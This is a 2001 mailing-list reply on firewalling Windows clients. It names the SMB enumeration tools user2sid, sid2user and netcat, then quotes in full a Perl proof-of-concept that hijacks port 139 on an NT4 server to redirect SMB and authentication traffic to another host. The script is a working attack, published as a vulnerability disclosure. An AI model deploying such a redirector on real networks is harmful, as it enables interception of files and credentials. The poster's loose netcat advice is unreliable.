[Gllug] DHCP/Firewalls

Fri Aug 24 09:14:27 UTC 2001

> -----Original Message-----
> From: Xander D Harkness [mailto:xander at harkness.co.uk]
> 
> I am told that there is a product that does this (not sure of 
> the name) 
> but prob windows (secure, errm no!).
> 
> I would really like to solve this with Linux and I am sure that it is 
> possible, but I do not know enough about the information 
> coming out of a 
> windows box.  ie does it give user or group info when running telnet?

Have a look at the following tools that can be used on internal networks to
glean information

user2sid
sid2user

These two complement each other and show another potential hole in windows.

netcat

Very good but I have not used it in anger just playing at home. It can be
used to telnet onto windows boxes apparently although I have been unable to
do it.

Any of these can be used to get information from Windows boxes and if you
are going to be letting people log in from external sources then you cannot
trust them. Netcat can be used to ensure that they will be unable to bind to
the various ports across the firewall. I imagine there are a million and one
ways that they are going to be able to do bad things if you are using
Windows. The most interesting is probably netcat that can be used to bind to
Port 139 and monitor it.  This tool in the right hands can help you monitor
security. Are you trying to secure against the people who will have login
rights or from external threats across the net. If you know perl you could
also have a look at the following. I am not sure how relevant this is to
Window 2K but I imagine it has 139 open as well.

#!/usr/bin/perl
# This script demonstrates  a major security problem  with Windows
# NT4.  It  is  based   on  an  earlier  script  (paul.pl)that
# demonstrated  a problem  with a  protocol change  that Microsoft
# proposed.   The  change  in  this  script  takes advantage of  a
# security hole pointed out by L0pht (http://www.l0pht.com/).

# What this  script does is  allow any unprivileged  user on a  NT
# Server  to  redirect  the  local  SMB services to any other  SMB
# server which they have an  IP address for. This allows the  user
# to redirect file, printer and authentication services to another
# server. This has enormous consequences for security.

# This script was written by Andrew Tridgell and is being sent  to
# the CIFS  discussion list so  that CIFS developers  become aware
# of this problem. It should be noted that the L0pht  announcement
# (which predates this script) already provided an example command
# using netcat to achieve the  same thing so this script does  not
# actually  offer malicious  hackers anything  more than  what has
# already been  widely distributed. I  wrote this example  so that
# the consequences would become clear  to the people who are in  a
# position to do something about fixing the problem.

# USAGE:
# To use this script install perl5 then run the command
#perl redirect.pl <localip> <remoteip>
# for example
#perl redirect.pl 192.168.2.13 192.168.2.10
# this would redirect any SMB connections made to the local server
# (whose  IP  address  is  192.168.2.13)  to  the  remote   server
# 192.168.2.10. Any browsing, file access, authentication requests
# or  printing done  to the  local server  by SMB  clients will be
# redirected to the remote server.

use IO::Socket;
use IO::Select;

if ($#ARGV != 1) {
print "Usage: redirect.pl <localip> <remoteip>\n";
exit 0;
}

my $local = $ARGV[0];
my $target = $ARGV[1];

my $smbport = "139";
my $Msg;

# this is a *SMBSERVER netbios name
my $netbname = "CKFDENECFDEFFCFGEFFCCACACACACACA";

print "setting up redirection from $local to $target ...\n";

# Create a local socket
$sock1 = new IO::Socket::INET(LocalAddr=>$local,LocalPort=>$smbport,
  Proto=>'tcp',Listen=>5,Reuse=>1);

while (1) {

print "listening on $local\n";

# Accept a connection
$IS = $sock1->accept() || die;

# Open a socket to the remote host
$OS = new
IO::Socket::INET(PeerAddr=>$target,PeerPort=>$smbport,Proto=>'tcp') ||
die;

print "connected to $target\n";

# Create a read set for select()
$rs = new IO::Select();
$rs->add($IS,$OS);

$first = 1;
$finished = 0;

while(! $finished) {
($r_ready) = IO::Select->select($rs,undef,undef,undef);

foreach $i (@$r_ready) {
$o = $OS if $i == $IS;
$o = $IS if $i == $OS;

recv($i,$Msg,8192,0);
if (! length $Msg) {
$finished = 1;
break;
}

if ($first && substr($Msg,0,1) eq "\x81") {
print "replacing called name\n";
$msg2 =
join('',substr($Msg,0,5),$netbname,substr($Msg,37,length($Msg)-37));
send($o,$msg2,0);
$first = 0;
} else {
if ($i == $OS) { $Msg =~ s/Paul/Oops/mg;}
send($o,$Msg,0);
}
}
}
# loop back to the top again
}

**********************************************************************
COLT Telecommunications
Registered in England No. 2452736
Registered Office: Bishopsgate Court, 4 Norton Folgate, London E1 6DQ
Tel. 020 7390 3900

This message is subject to and does not create or vary any contractual
relationship between COLT Telecommunications, its subsidiaries or 
affiliates ("COLT") and you. Internet communications are not secure
and therefore COLT does not accept legal responsibility for the
contents of this message.  Any view or opinions expressed are those of
the author. The message is intended for the addressee only and its
contents and any attached files are strictly confidential. If you have
received it in error, please telephone the number above. Thank you.

**********************************************************************

-- 
Gllug mailing list  -  Gllug at linux.co.uk
http://list.ftech.net/mailman/listinfo/gllug